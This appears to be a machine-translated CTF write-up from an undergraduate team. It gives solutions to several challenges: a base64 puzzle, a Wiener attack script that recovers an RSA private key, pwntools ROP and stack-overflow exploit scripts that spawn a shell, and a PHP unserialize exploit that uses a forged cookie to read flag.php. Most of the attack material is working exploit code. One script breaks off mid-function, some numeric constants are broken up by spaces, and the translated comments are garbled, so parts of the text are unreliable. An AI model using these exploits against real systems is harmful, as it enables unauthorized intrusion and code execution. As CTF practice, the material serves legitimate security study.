Undergraduate Group
1837
MTEgMTExIDAwMCAwMCAwMTExMSAwMDAgMDAxMCAwMDEgMTA
base64 -> transmos
flag{mosi1sfun}
rsa
e is large, considering wiener
import gmpy2
import libnum
def continuedFra(x, y):
"""Calculate continued fractions
:param x: numerator
:param y: denominator
:return: list of continued fractions
"""
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf
def gradualFra(cf):
"""Calculate the progressive score at the end of the incoming list
:param cf: list of continued fractions
:return: the asymptotic score at the end of the list
"""
numerator = 0
denominator = 1
for x in cf[::-1]:
# The numerator and denominator of the progressive fraction here should be separated
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator
def solve_pq(a, b, c):
"""Use the Vedic theorem to understand pq, x^2?(p + q)?x + pq=0
:param a: Coefficient of x^2
:param b:coefficient of x
:param c:pq
:return: p,q
"""
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
"""Computes the asymptotic scores for all lists
:param cf: list of continued fractions
:return: all asymptotic scores for the list
"""
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf
def wienerAttack(e, n):
"""
:param e:
:param n:
:return: private key d
"""
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d
n=0x1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d 17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93b f
e=0xe42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac0 18cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939
c=0xd19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92 533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3
d=wienerAttack(e,n)
print(d)
m=pow(c,d,n)
print(libnum.n2s(m).decode())
#flag1sH3r3_d_ist0sma1l
misc3
Two-question plaintext attack
CTF-Misc Essentials | JackHCC
Why can’t the original flag be handed in?
I can’t hand in the flag, ? Will there be a competition, flag crtl + c v v is not good? Get the answer right? Right understand?
Let’s make something to eat
#coding:utf-8
from pwn import *
from LibcSearcher import *
from sys import *
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
context(arch='amd64', os='linux')
file = './food'
p = process(file)
e = ELF(file)
rop = ROP(file)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.R:
p = remote('n',)
e = ELF(file)
libc = ELF('./libc-2.27.buu.so')
lg = lambda s : log.success('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
uu32 = lambda data : u32(data. ljust(4, b'\x00'))
uu64 = lambda data : u64(data. ljust(8, b'\x00'))
sla = lambda x,y : p.sendlineafter(x,y)
sa = lambda x,y : p.sendafter(x,y)
sl = lambda x : p. sendline(x)
s = lambda x : p.send(x)
ru = lambda x : p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda: p.recvline()
system = 0
binsh = 0
poprdi = 0
ret = 0
libc_base = 0
def cuos(func, addr):
global system, binsh, poprdi, ret, libc_base
libc_base = addr - libc.sym[func]
log.success('libc_base = ' + hex(libc_base))
system = libc_base + libc.sym['system']
log.success('system = ' + hex(system))
binsh = libc_base + next(libc. search(b'/bin/sh\x00'))
log.success('binsh = ' + hex(binsh))
poprdi = rop.find_gadget(['pop rdi','ret'])[0]
log.success('poprdi = ' + hex(poprdi))
ret = rop.find_gadget(['ret'])[0]
log.success('ret = ' + hex(poprdi))
def csu(text,edi,rsi,rdx,rip):
payload = b""
payload += p64(0x400c40 + 90)
payload += p64(0) #rbx
payload += p64(1) #rbp
payload += p64(rip) #r12
payload += p64(rdx) #r13
payload += p64(rsi) #r14
payload += p64(edi) #r15
payload += p64(0x400c40 + 64)
payload += p64(0)*7
return payload
def debug(cmd=''):
gdb. attach(p, cmd)
#pause()
#"b $rebase(0x10)"
def add(index, size):
sla('5.- Exit\\
','1')
sla('the food\\
', str(index))
sla(' kcal.\\
', str(size))
def edit(index,des):
just stack overflow
from pwn import *
from struct import pack
from ctypes import *
import hashlib
def s(a):
p. send(a)
def sa(a, b):
p. sendafter(a, b)
def sl(a):
p. sendline(a)
def sla(a, b):
p. sendlineafter(a, b)
def r():
p.recv()
def pr():
print(p. recv())
def rl(a):
return p.recvuntil(a)
def inter():
p. interactive()
def debug():
gdb. attach(p)
pause()
def get_addr():
return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn')
#p = remote('', )
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
sla(b'have:\\
', b'1')
sla(b'numbers\\
', b'1')
def edit(idx, data):
sla(b'exit\\
', b'3')
sla(b'change:\\
', str(idx))
sla(b'number:\\
', str(data))
edit(0x84, 0x9b)
edit(0x85, 0x85)
edit(0x86, 0x4)
edit(0x87, 0x8)
#gdb.attach(p, 'b *0x80488F2')
sla(b'exit\\
', b'5')
#pause()
inter()
pop
<?php
header("content-type:text/html;charset=utf-8");
class Readme{
public $source;
public function __toString()
{
return highlight_file('Readme.txt', true).highlight_file($this->source, true);
}
}
if(isset($_GET['source'])){
$s = new Readme();
$s->source = __FILE__;
echo $s;
exit;
}
$todos = [];
if(isset($_COOKIE['todos'])){
$c = $_COOKIE['todos'];
$h = substr($c, 0, 32);
$m = substr($c, 32);
if(md5($m) === $h){
$todos = unserialize($m);
}
}
if(isset($_POST['text'])){
$todo = $_POST['text'];
$todos[] = $todo;
$m = serialize($todos);
$h = md5($m);
setcookie('todos', $h.$m);
header('Location: '.$_SERVER['REQUEST_URI']);
exit;
}
?>
GET /HTTP/1.1
Host: 1.1.2.100:1080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://1.1.2.100:1080
Connection: close
Referer: http://1.1.2.100:1080/
Cookie: todos=fae1710f5e51885bcf095e718ca752cca:1:{i:0;O:6:"readme":1:{s:6:"source";s:10:"./flag.php"; }}
Upgrade-Insecure-Requests: 1
text=1